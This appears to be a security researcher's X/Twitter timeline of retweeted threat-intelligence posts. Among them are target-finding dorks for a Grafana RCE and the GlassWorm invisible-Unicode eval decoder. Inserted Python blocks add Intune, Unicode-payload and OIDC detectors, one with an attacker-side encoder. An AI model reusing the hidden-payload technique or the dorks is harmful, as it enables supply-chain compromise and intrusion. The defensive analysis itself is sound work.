Watch3r

807 posts


@Watch3r755

IR (Incident Response) / DF / Malware Forensics / TI https://t.co/KczsCPePg8

Somewhere · Joined January 2024
163 Following · 20 Followers
Watch3r retweeted
ZoomEye (@zoomeye_team)
🚨 CVE-2026-27876: RCE on Grafana via sqlExpressions
Critical RCE via SQL Expressions + Enterprise Plugin Chain!
An attacker exploits the enabled sqlExpressions feature toggle in Grafana OSS to inject malicious SQL expressions that, when processed by a vulnerable Grafana Enterprise plugin (e.g., for data transformation or dashboard scripting), trigger deserialization or code evaluation leading to remote arbitrary code execution.
Full Vulnerability Details & Analysis at DarkEye: 🔗 darkeye.org/vuln/cve/CVE-2…
🔍 Identify Targets via ZoomEye:
Filter: vul.cve="CVE-2026-27876"
Search Dork: app="Grafana"
Exposure: 83k+ instances identified globally.
ZoomEye Search Link: 👉 zoomeye.ai/searchResult?q…
#Grafana #RCE #SQLInjection #ChainedVuln #EnterpriseRisk #DarkEye
Watch3r retweeted
TrendAI Zero Day Initiative
We have adjusted the scoring on the advisory to reflect server-side mitigations that the vendor described during the disclosure process.
Watch3r retweeted
International Cyber Digest (@IntCyberDigest)
🚨‼️ EXCLUSIVE: Zoom was breached by threat actor Mr. Raccoon. A South Korean employee installed an infostealer via a fake Zoom-themed website, delivered through a spoofed security email. Mr. Raccoon told us: "Their security was terrible, but Okta saved them."
Watch3r retweeted
Justin Elze (@HackingLZ)
For those of you playing around at home with the LiteLLM supply chain stuff. Here are the decoded payloads and other info. github.com/HackingLZ/lite…
Watch3r retweeted
Guri Singh (@heygurisingh)
🚨 BREAKING: The cybersecurity industry is about to get completely disrupted.
Someone just open-sourced a fully autonomous AI Red Team. It's called PentAGI. 8,200+ stars on GitHub.
Not one AI agent. An entire simulated security firm. Researchers, developers, pentesters, and risk analysts. All AI. All coordinating with each other before launching a single attack.
No Cobalt Strike. No $100K/year pentest retainers. No OSCP required.
Here's what's inside this thing:
→ An Orchestrator agent that plans the full attack chain
→ A Researcher agent that gathers intel from the web, search engines, and vulnerability databases
→ A Developer agent that writes custom exploit code on the fly
→ An Executor agent that runs 20+ pro security tools (nmap, metasploit, sqlmap, and more)
→ A memory system that learns from every engagement and gets smarter over time
Here's the wildest part: It runs everything inside sandboxed Docker containers. Full isolation. It picks the right container image for each task automatically.
It has a knowledge graph powered by Neo4j that tracks relationships between targets, vulnerabilities, tools, and techniques across every single test.
Cybersecurity firms charge $25K-$150K per engagement for this exact workflow. This is free. 100% Open Source. MIT License.
Watch3r retweeted
The DFIR Report (@TheDFIRReport)
Threat Actors are "Bringing Their Own Forensics" In a recent ClickFix campaign, we saw threat actors likely related to Interlock Ransomware, running Volatility (vol.py) directly on victim machines. Commonly a tool for defenders, the TAs are using it to:
Watch3r retweeted
Samuel Bendett (@sambendett)
Telegram fights back in Russia:
"Telegram proxies are currently launching a counter-attack against Roskomnadzor’s (RKN) censorship infrastructure, flooding its filters with junk data and overloading them to a critical state. As a result, not only is Telegram suffering, but so is a host of other services, including those the authorities had intended to leave alone. Consequently, service disruptions are being observed nationwide, even affecting platforms that were never targeted for blocking, such as websites on RKN’s "whitelist," certain government services, and occasionally even VKontakte.
An interesting side effect has emerged: in several regions, WhatsApp (specifically voice and video calls) has suddenly sprung back to life. This occurred because the TSPU (Technical Means of Countering Threats) system temporarily "eased up" on certain filters in an attempt to cope, however imperfectly, with the massive primary load generated by Telegram.
This is currently one of the most widely discussed instances of "technical trolling" directed at RKN in recent years. I have a feeling that Durov’s team is going to make life very difficult for RKN in the future, especially when comparing the skill levels and salaries of Durov’s programmers against those of RKN’s mediocre coders, who are scraping by on peanuts. (After all, the truly talented programmers have either emigrated or are working for private companies.)"
t.me/borisenkoD/336…
Watch3r retweeted
WhiskeyHacker (@whiskeyhacker)
Taken from the Stryker Handala / Intune Detection Pack v2:
"Check PIM role settings for Global Administrator, Intune Administrator, and Cloud Device Administrator. If you see only the "Require Azure MFA" checkbox and no Authentication Context configured, you have the same gap that enabled the Stryker wipe. Configure Authentication Context with FIDO2 or certificate-based auth today.
Enable Intune Multi-Admin Approval for wipe, retire, and delete actions. Tenant Administration > Multi Admin Approval. Under 10 minutes. No additional licensing required.
Deploy Rule 13 (bulk wipe threshold alert). Five wipes in 15 minutes from a single identity fires the alert. Wire it to a Logic App that calls revokeSignInSessions on the triggering account via Microsoft Graph."
Link to the Detection Pack v2 blog and direct download. Please share so others can lock down their Intune environments: threathunter.ai/blog/iran-hand…
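The "five wipes in 15 minutes from a single identity" rule quoted above is a sliding-window threshold over audit events, and the response it is wired to is one Microsoft Graph call. As an added example (not the Detection Pack's Rule 13 and not code from the post), here is that logic in Python over a handful of constructed audit records, plus the request a Logic App would issue to revoke the triggering account's sessions. The record shape (`time`, `actor`, `op`, `device`) and the sample identities are assumptions; real Intune audit events from `deviceManagement/auditEvents` must be mapped into this shape first.

```python
"""Bulk-wipe threshold alert over Intune-style audit events (sliding window).

Added example, not the Detection Pack's own rule. The record shape and the
sample data are constructed for this demo; map real Intune audit events
(Microsoft Graph deviceManagement/auditEvents) into the same fields first.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

THRESHOLD = 5                                   # this many destructive actions ...
WINDOW = timedelta(minutes=15)                  # ... inside this window fires the alert
DESTRUCTIVE_OPS = {"wipe", "retire", "delete"}  # the actions the post gates behind Multi-Admin Approval
GRAPH = "https://graph.microsoft.com/v1.0"

# Constructed sample: one identity wipes six devices in twelve minutes (should alert),
# an admin does three destructive actions spread over two hours (should not),
# an ops account retires five devices eight minutes apart (never five inside 15 minutes).
SAMPLE_EVENTS = [
    {"time": "2026-03-10T10:00:00+00:00", "actor": "svc-helpdesk@contoso.example", "op": "wipe", "device": "dev-001"},
    {"time": "2026-03-10T10:02:00+00:00", "actor": "svc-helpdesk@contoso.example", "op": "wipe", "device": "dev-002"},
    {"time": "2026-03-10T10:03:00+00:00", "actor": "svc-helpdesk@contoso.example", "op": "sync", "device": "dev-100"},
    {"time": "2026-03-10T10:05:00+00:00", "actor": "svc-helpdesk@contoso.example", "op": "wipe", "device": "dev-003"},
    {"time": "2026-03-10T10:07:00+00:00", "actor": "svc-helpdesk@contoso.example", "op": "wipe", "device": "dev-004"},
    {"time": "2026-03-10T10:09:00+00:00", "actor": "svc-helpdesk@contoso.example", "op": "wipe", "device": "dev-005"},
    {"time": "2026-03-10T10:12:00+00:00", "actor": "svc-helpdesk@contoso.example", "op": "wipe", "device": "dev-006"},
    {"time": "2026-03-10T08:00:00+00:00", "actor": "admin@contoso.example", "op": "wipe", "device": "dev-201"},
    {"time": "2026-03-10T09:10:00+00:00", "actor": "admin@contoso.example", "op": "retire", "device": "dev-202"},
    {"time": "2026-03-10T10:30:00+00:00", "actor": "admin@contoso.example", "op": "delete", "device": "dev-203"},
] + [
    {"time": f"2026-03-10T11:{8 * i:02d}:00+00:00", "actor": "ops@contoso.example", "op": "retire", "device": f"dev-3{i:02d}"}
    for i in range(5)
]


def detect_bulk_wipes(events, threshold=THRESHOLD, window=WINDOW):
    """Return one alert per actor, raised the first time >= threshold destructive
    actions by that actor fall inside a single window. Non-destructive ops are ignored."""
    ordered = sorted(events, key=lambda e: datetime.fromisoformat(e["time"]))
    recent = defaultdict(deque)   # actor -> deque of (timestamp, device) still inside the window
    alerted, alerts = set(), []
    for e in ordered:
        if e["op"].lower() not in DESTRUCTIVE_OPS:
            continue
        ts = datetime.fromisoformat(e["time"])
        q = recent[e["actor"]]
        q.append((ts, e["device"]))
        while q and q[0][0] < ts - window:   # drop actions that have aged out of the window
            q.popleft()
        if len(q) >= threshold and e["actor"] not in alerted:
            alerted.add(e["actor"])
            alerts.append({
                "actor": e["actor"],
                "count": len(q),
                "first": q[0][0].isoformat(),
                "last": ts.isoformat(),
                "devices": [device for _, device in q],
            })
    return alerts


def build_revoke_request(alert):
    """The Graph call the post wires the alert to: POST /users/{id}/revokeSignInSessions.
    Returned as a dict rather than sent, so the example runs offline."""
    return {
        "method": "POST",
        "url": f"{GRAPH}/users/{alert['actor']}/revokeSignInSessions",
        "reason": f"{alert['count']} destructive Intune actions between {alert['first']} and {alert['last']}",
    }


if __name__ == "__main__":
    for alert in detect_bulk_wipes(SAMPLE_EVENTS):
        print("ALERT   ", alert)
        print("RESPONSE", build_revoke_request(alert))
```

The alert fires on the fifth wipe, not after the fact, so the revocation lands while the actor still has a session to lose; anything that followed the fifth action is still in the audit trail for the investigation.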
Watch3r retweeted
INTERPOL (@INTERPOL_HQ)
🚨 45,000 malicious IP addresses taken down in global operation targeting phishing, malware and ransomware
Coordination across 72 countries and territories led to:
🔵 94 arrests
🔵 110 suspects under investigation
🔵 202 electronic devices and servers seized
Cases revealed a range of cyber-enabled fraud schemes, from phishing websites and identity theft to hacked social media accounts, as well as romance scams, sextortion and financial fraud.
Read more ➡️ 🔗 bit.ly/4bmvkTs
Watch3r retweeted
Mackenzie Jackson (@advocatemack)
🚨 150+ GitHub repositories compromised by GlassWorm Malware [LIVE]
A new wave of the invisible Unicode supply chain attack has hit GitHub, the same technique we first detected in malicious npm packages in March 2025, later named GlassWorm.
The attack hides malware inside Unicode characters that render as nothing, meaning the payload looks like an empty string during code review.
Example of the decoder pattern we’re seeing injected:
const s = v => [...v].map(w => ( w = w.codePointAt(0), w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 : w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null )).filter(n => n !== null); eval(Buffer.from(s(``)).toString('utf-8'));
That backtick string from(s(``) looks empty, but actually contains 9,000 invisible characters that decode into the real malicious payload at runtime.
Some notable compromised repositories include:
⭐ pedronauck/reworm — 1,460 stars
⭐ pedronauck/spacefold — 62 stars
⭐ anomalyco/opencode-bench — 56 stars
⭐ doczjs/docz-plugin-css — 39 stars
⭐ uknfire/theGreatFilter — 38 stars
We’re also seeing the same technique appear in npm packages and a VS Code extension, showing a coordinated push across ecosystems.
Full write-up below 👇 (coming)
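The decoder quoted above turns Unicode variation selectors into bytes: U+FE00..U+FE0F yield 0..15 and U+E0100..U+E01EF yield 16..255, so one selector carries one byte and a template literal that renders as empty can carry an entire script. As an added example (not GlassWorm's code and not from the post's author), the Python below implements that mapping in both directions, hides a harmless constructed payload the way the attacker side does, and scans a constructed source file for long runs of variation selectors, decoding them without executing anything. The payload, the sample source and the marker list are assumptions made for the demo.

```python
"""Find and decode payloads hidden in Unicode variation selectors.

Added example, not GlassWorm's code. The byte mapping mirrors the quoted decoder:
  U+FE00..U+FE0F   -> 0..15    (variation selectors 1-16)
  U+E0100..U+E01EF -> 16..255  (variation selectors 17-256)
The sample payload and source text below are constructed for this demo.
"""
import re
import unicodedata

VS_LOW = range(0xFE00, 0xFE10)
VS_HIGH = range(0xE0100, 0xE01F0)
VS_CLASS = "[\uFE00-\uFE0F\U000E0100-\U000E01EF]"   # regex class covering both selector blocks


def encode_hidden(data: bytes) -> str:
    """One byte -> one variation selector (the attacker-side half of the scheme)."""
    return "".join(chr(0xFE00 + b) if b < 16 else chr(0xE0100 + b - 16) for b in data)


def decode_hidden(text: str) -> bytes:
    """Recover bytes from every variation selector in text; all other characters are
    skipped, exactly like the injected decoder's filter(n => n !== null)."""
    out = bytearray()
    for ch in text:
        cp = ord(ch)
        if cp in VS_LOW:
            out.append(cp - 0xFE00)
        elif cp in VS_HIGH:
            out.append(cp - 0xE0100 + 16)
    return bytes(out)


def visible_length(text: str) -> int:
    """Characters a reviewer actually sees: variation selectors are non-spacing marks (Mn)."""
    return sum(1 for ch in text if unicodedata.category(ch) != "Mn")


def find_hidden_runs(source: str, min_run: int = 8) -> list:
    """Locate runs of at least min_run variation selectors and decode each one.
    Short runs are left alone: a lone VS16 after an emoji is legitimate text."""
    pattern = re.compile(VS_CLASS + "{%d,}" % min_run)
    hits = []
    for m in pattern.finditer(source):
        run = m.group()
        hits.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "selectors": len(run),
            "payload": decode_hidden(run).decode("utf-8", "replace"),
        })
    return hits


# Cheap signature for the decoder stub itself. Assumed markers: the hex literals may be
# rewritten as decimals or split apart, so treat a miss as inconclusive, not as clean.
DECODER_MARKERS = ("0xFE00", "0xE0100", "codePointAt", "eval(")


def looks_like_decoder(source: str) -> bool:
    return all(marker in source for marker in DECODER_MARKERS)


# Constructed sample: the quoted decoder stub with a harmless payload hidden in the template literal.
HIDDEN = encode_hidden(b"console.log('pwned by demo')")
SAMPLE_SOURCE = (
    "const s = v => [...v].map(w => (w = w.codePointAt(0), "
    "w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 : "
    "w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 : null)).filter(n => n !== null);\n"
    "eval(Buffer.from(s(`" + HIDDEN + "`)).toString('utf-8'));\n"
)

if __name__ == "__main__":
    print("decoder stub present:", looks_like_decoder(SAMPLE_SOURCE))
    literal = "`" + HIDDEN + "`"
    print("template literal renders as", visible_length(literal), "chars but is", len(literal), "code points")
    for hit in find_hidden_runs(SAMPLE_SOURCE):
        print(hit)
```

Run it over a checkout with `find_hidden_runs(open(path, encoding="utf-8").read())` per file; a hit in a source file is worth a look regardless of whether the decoder stub is recognised, since the stub is trivially rewritten but the selector run is the payload itself.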
Watch3r retweeted
The Hacker News (@TheHackersNews)
🛑 Attackers turned the nx npm supply-chain compromise into full AWS admin access in under 72 hours. Google says UNC6426 stole a developer’s GitHub token via QUIETVAULT, abused GitHub-to-AWS OIDC trust, created a new admin role, then accessed S3 data and destroyed production systems. 🔗 Read → thehackernews.com/2026/03/unc642…
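The post says the attacker abused a GitHub-to-AWS OIDC trust, not how. A role's trust policy is where that trust is scoped: if the `token.actions.githubusercontent.com:sub` condition is missing or wildcarded, a GitHub Actions token minted for any repository, including one the attacker controls, can call `sts:AssumeRoleWithWebIdentity` against it. As an added example (not code from the post or the report, and not a claim about what was misconfigured at the victim), the Python below audits a trust-policy document for that class of weakness, with a constructed over-broad policy beside a pinned one. The account ID and repository names are placeholders.

```python
"""Audit IAM role trust policies for over-broad GitHub Actions OIDC conditions.

Added example, not code from the post or the cited report. The two policies are
constructed; 123456789012 and example-org/example-app are placeholders.
"""
GITHUB_OIDC = "token.actions.githubusercontent.com"
ASSUME_WEB = "sts:AssumeRoleWithWebIdentity"
PROVIDER_ARN = "arn:aws:iam::123456789012:oidc-provider/" + GITHUB_OIDC   # placeholder account

# Weak: aud is pinned, but sub is "repo:*", so a token minted for ANY GitHub repository is accepted.
WEAK_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": PROVIDER_ARN},
        "Action": ASSUME_WEB,
        "Condition": {
            "StringEquals": {GITHUB_OIDC + ":aud": "sts.amazonaws.com"},
            "StringLike": {GITHUB_OIDC + ":sub": "repo:*"},
        },
    }],
}

# Hardened: only workflows running on example-org/example-app's main branch can assume the role.
HARDENED_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": PROVIDER_ARN},
        "Action": ASSUME_WEB,
        "Condition": {
            "StringEquals": {
                GITHUB_OIDC + ":aud": "sts.amazonaws.com",
                GITHUB_OIDC + ":sub": "repo:example-org/example-app:ref:refs/heads/main",
            },
        },
    }],
}


def _as_list(value):
    """IAM accepts a scalar or a list in most fields; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def check_sub(sub: str):
    """Finding for an over-broad sub pattern, or None when it pins owner/repo and a ref or environment.
    GitHub's sub claim is repo:OWNER/NAME:ref:refs/heads/BRANCH or repo:OWNER/NAME:environment:NAME."""
    parts = sub.split(":", 2)   # ["repo", "owner/name", "ref:refs/heads/main"]
    if parts[0] != "repo" or len(parts) < 2 or not parts[1] or parts[1].startswith("*"):
        return f"sub {sub!r} does not pin a repository owner: any GitHub repository can assume the role"
    if "*" in parts[1]:
        return f"sub {sub!r} allows every repository under the owner"
    if len(parts) < 3 or parts[2] in ("", "*"):
        return f"sub {sub!r} pins the repository but accepts any branch, tag, pull request or environment"
    return None


def audit_github_oidc_trust(policy: dict) -> list:
    """Return findings for every Allow statement that lets GitHub's OIDC provider assume the role."""
    findings = []
    for i, st in enumerate(_as_list(policy.get("Statement"))):
        principal = st.get("Principal", {})
        federated = _as_list(principal.get("Federated")) if isinstance(principal, dict) else []
        if st.get("Effect") != "Allow" or ASSUME_WEB not in _as_list(st.get("Action")):
            continue
        if not any(p.endswith("oidc-provider/" + GITHUB_OIDC) for p in federated):
            continue
        cond = st.get("Condition", {})
        equals, like = cond.get("StringEquals", {}), cond.get("StringLike", {})
        if "sts.amazonaws.com" not in _as_list(equals.get(GITHUB_OIDC + ":aud")):
            findings.append(f"statement {i}: aud is not pinned to sts.amazonaws.com")
        subs = _as_list(equals.get(GITHUB_OIDC + ":sub")) + _as_list(like.get(GITHUB_OIDC + ":sub"))
        if not subs:
            findings.append(f"statement {i}: no sub condition: any GitHub Actions token can assume the role")
        for sub in subs:
            problem = check_sub(sub)
            if problem:
                findings.append(f"statement {i}: {problem}")
    return findings


if __name__ == "__main__":
    for name, policy in (("weak", WEAK_TRUST_POLICY), ("hardened", HARDENED_TRUST_POLICY)):
        print(name, audit_github_oidc_trust(policy) or ["no findings"])
```

Pinning `sub` limits who can mint a usable token; it does not limit what the role can do once assumed, so the hardened trust policy still belongs on a role whose permissions policy cannot create IAM roles or touch production data.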
Watch3r retweeted
Cozy (@cosyposter)
ZXX
Watch3r retweeted
Jay in Kyiv (@JayinKyiv)
The Russian government is teaching a whole new generation of filthy Russian barbarians all the techniques of ripping apart the west with disinformation. Meanwhile, western governments mostly refuse to counter it in any way.
Watch3r retweeted
Socket (@SocketSecurity)
🦀 5 malicious Rust crates posed as time utilities and attempted to exfiltrate .env secrets from developer environments. Our research uncovered a coordinated campaign using lookalike infrastructure to steal credentials. Read the analysis → socket.dev/blog/5-malicio… #Rustlang
Watch3r retweeted
Who said what? (@g0njxa)
⚠️ Watch out for an SEO poisoning campaign impersonating VMware vSphere downloads, leveraging the MeshCentral RMM tool bundled into fake installers targeting enterprise environments.
Sample: dbfe1f915f40122a336cd5d0de802a6f3ec0204ab75321934a06dafbc1964446
Detonation: app.any.run/tasks/e0937ead…
From malicious search results -> vmware-vsphere[.]com (associates: vmwarevsphere[.]com, vmware-remote-console[.]com, remote-console-vmware[.]com, vsphere-client[.]com, vsphere-client[.]org) leading to vmware-repository[.]com
A malicious build with an EV signature issued to the malicious signer "Pacex Learning Private Limited" (GlobalSign) is delivered from Dropbox. The build connects to 103.65.230.86 (MeshCentral RMM C2) and installs a legit VMware product as a decoy.
Watch3r retweeted
Unit 42 (@Unit42_Intel)
We’ve discovered a massive campaign using 30k-plus hostnames to distribute a #BrowserExtension named "OmniBar AI Chat and Search." This extension overrides the browser homepage and uses an attacker-controlled domain for #SearchHijacking. Details at bit.ly/4dbRVED